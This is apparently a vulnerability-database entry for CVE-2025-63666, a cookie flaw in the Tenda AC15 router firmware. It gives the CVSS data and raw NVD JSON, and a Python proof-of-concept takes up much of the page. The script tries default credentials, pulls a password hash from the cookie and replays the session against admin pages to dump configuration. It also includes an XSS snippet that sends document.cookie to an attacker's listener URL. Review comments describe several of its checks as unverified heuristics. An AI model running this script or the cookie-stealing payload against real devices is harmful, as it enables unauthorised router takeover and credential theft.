Security Vulnerability Report
CVE-2025-63666 CVSS 9.8 CRITICAL

CVE-2025-63666

Published: 2025-11-12 15:15:39
Last Modified: 2025-11-17 18:59:20

Description

Tenda AC15 (v15.03.05.18_multi) issues an authentication cookie that exposes the account password hash to the client and uses a short, low-entropy suffix as the session identifier. An attacker with network access or the ability to run JS in a victim browser can steal the cookie and replay it to access protected resources.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tenda:ac15_firmware:15.03.05.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tenda:ac15:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform entry paired with the firmware CPE above via an AND node; it qualifies where the firmware runs and is not an exemption for the device)
Tenda AC15 v15.03.05.18_multi

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
#!/usr/bin/env python3
# CVE-2025-63666 PoC - Tenda AC15 Authentication Cookie Hash Exposure
# This PoC demonstrates the cookie stealing and replay attack
#
# NOTE(review): the script is unauthenticated HTTP only (the base URL is
# hard-coded to http://); nothing below verifies the target is the
# firmware version named in the advisory, so every "[+]" line is a
# heuristic rather than a confirmed finding.

import requests
import hashlib  # NOTE(review): imported but never referenced in this file
import re
from urllib.parse import urljoin

def exploit_tenda_ac15(target_ip, attacker_cookie_listener=None):
    """
    Exploit CVE-2025-63666 on Tenda AC15 router

    Args:
        target_ip: IP address of the vulnerable Tenda AC15 router
        attacker_cookie_listener: URL to receive stolen cookies (for XSS attack)

    Returns:
        The session's cookie dict after the replay attempts, or None when no
        login attempt produced a cookie.

    NOTE(review): attacker_cookie_listener is accepted but never read inside
    this function; only target_ip influences behaviour.
    """
    base_url = f"http://{target_ip}"

    # Step 1: Try to get the authentication cookie
    print("[*] Step 1: Obtaining authentication cookie...")
    login_url = urljoin(base_url, "/login")

    # Attempt to login with default credentials
    credentials = [
        ("admin", "admin"),
        ("admin", "password"),
        ("root", "root")
    ]

    session = requests.Session()
    valid_session = None

    # Success criterion is weak: any HTTP 200 that leaves at least one cookie
    # in the jar is treated as a login. A login form that answers 200 on
    # failure and sets a tracking cookie would satisfy it too — TODO confirm
    # against the device's actual login response before trusting "[+]".
    for username, password in credentials:
        login_data = {
            "username": username,
            "password": password
        }
        try:
            response = session.post(login_url, data=login_data, timeout=5)
            if response.status_code == 200:
                cookies = session.cookies.get_dict()
                if cookies:
                    print(f"[+] Logged in with {username}:{password}")
                    print(f"[+] Cookie obtained: {cookies}")
                    valid_session = session
                    break
        except Exception as e:
            # Broad catch: network errors and timeouts are reported and the
            # next credential pair is tried.
            print(f"[-] Login attempt failed: {e}")

    if not valid_session:
        print("[-] Could not obtain valid session")
        return None

    # Step 2: Analyze the cookie for exposed password hash
    print("\n[*] Step 2: Analyzing cookie for password hash exposure...")
    # The whole cookie dict is stringified, so the regex below runs over
    # cookie names and the dict's punctuation as well as the values.
    cookie_str = str(valid_session.cookies.get_dict())

    # The vulnerable cookie contains password hash in a specific format
    # Format: sessionID + low_entropy_suffix + password_hash
    # NOTE(review): the advisory does not state the hash algorithm; the
    # 64-hex-char pattern (SHA-256 length) is the author's assumption, and a
    # shorter digest would not be detected here — confirm on a real cookie.
    hash_pattern = re.findall(r'[a-f0-9]{64}', cookie_str)
    if hash_pattern:
        print(f"[!] Password hash found in cookie: {hash_pattern[0]}")
        print("[!] This hash can be used for offline cracking or replay")

    # Step 3: Replay the cookie to access protected resources
    print("\n[*] Step 3: Replaying cookie to access protected resources...")
    # NOTE(review): these paths are not given by the advisory; whether they
    # exist on the device is unverified here.
    protected_endpoints = [
        "/admin/index.html",
        "/admin/system_status",
        "/admin/wireless_settings",
        "/admin/network_settings"
    ]

    for endpoint in protected_endpoints:
        try:
            response = valid_session.get(urljoin(base_url, endpoint), timeout=5)
            if response.status_code == 200:
                print(f"[+] Successfully accessed {endpoint}")
                # Substring heuristic only: any page containing the word
                # "admin" (e.g. a nav link) is flagged as sensitive.
                if "password" in response.text.lower() or "admin" in response.text.lower():
                    print(f"[!] Sensitive data found in response from {endpoint}")
            else:
                print(f"[-] Access denied to {endpoint} (Status: {response.status_code})")
        except Exception as e:
            print(f"[-] Error accessing {endpoint}: {e}")

    # Step 4: Extract device configuration
    print("\n[*] Step 4: Extracting device configuration...")
    config_url = urljoin(base_url, "/admin/getConfig")
    try:
        response = valid_session.get(config_url, timeout=5)
        if response.status_code == 200:
            print(f"[+] Device configuration extracted:")
            # Only the first 500 characters are shown; nothing is written to disk.
            print(response.text[:500])
    except:
        # NOTE(review): bare except silently drops every error here,
        # including KeyboardInterrupt, so a failed fetch is indistinguishable
        # from a non-200 answer in the output.
        pass

    return valid_session.cookies.get_dict()

def generate_xss_payload(listener_url):
    """
    Generate XSS payload for stealing cookies in victim's browser

    NOTE(review): not called anywhere in this file. The snippet reads
    document.cookie, which only exposes cookies set without the HttpOnly
    flag — setting HttpOnly on the session cookie is the direct mitigation
    for this particular vector.
    """
    payload = f'''<script>
    fetch('{listener_url}?cookie=' + document.cookie);
    </script>'''
    return payload

if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print("Usage: python cve-2025-63666.py <target_ip>")
        print("Example: python cve-2025-63666.py 192.168.0.1")
        sys.exit(1)

    # Only the target argument is consumed; no listener URL is ever passed,
    # so the XSS path of the script is never exercised from the CLI.
    target = sys.argv[1]
    print(f"[*] Target: {target}")
    print(f"[*] Exploiting CVE-2025-63666\n")

    exploit_tenda_ac15(target)

References

Raw JSON Data

{"cve": {"id": "CVE-2025-63666", "sourceIdentifier": "[email protected]", "published": "2025-11-12T15:15:38.583", "lastModified": "2025-11-17T18:59:20.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tenda AC15 v15.03.05.18_multi) issues an authentication cookie that exposes the account password hash to the client and uses a short, low-entropy suffix as the session identifier. An attacker with network access or the ability to run JS in a victim browser can steal the cookie and replay it to access protected resources."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:ac15_firmware:15.03.05.18:*:*:*:*:*:*:*", "matchCriteriaId": "56881C41-A993-45CC-BAE6-E9DE17FA56E2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:ac15:-:*:*:*:*:*:*:*", "matchCriteriaId": "B73E7C1C-F121-486A-8B15-E97EA0C219A5"}]}]}], "references": [{"url": "https://github.com/Remenis/CVE-2025-63666", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}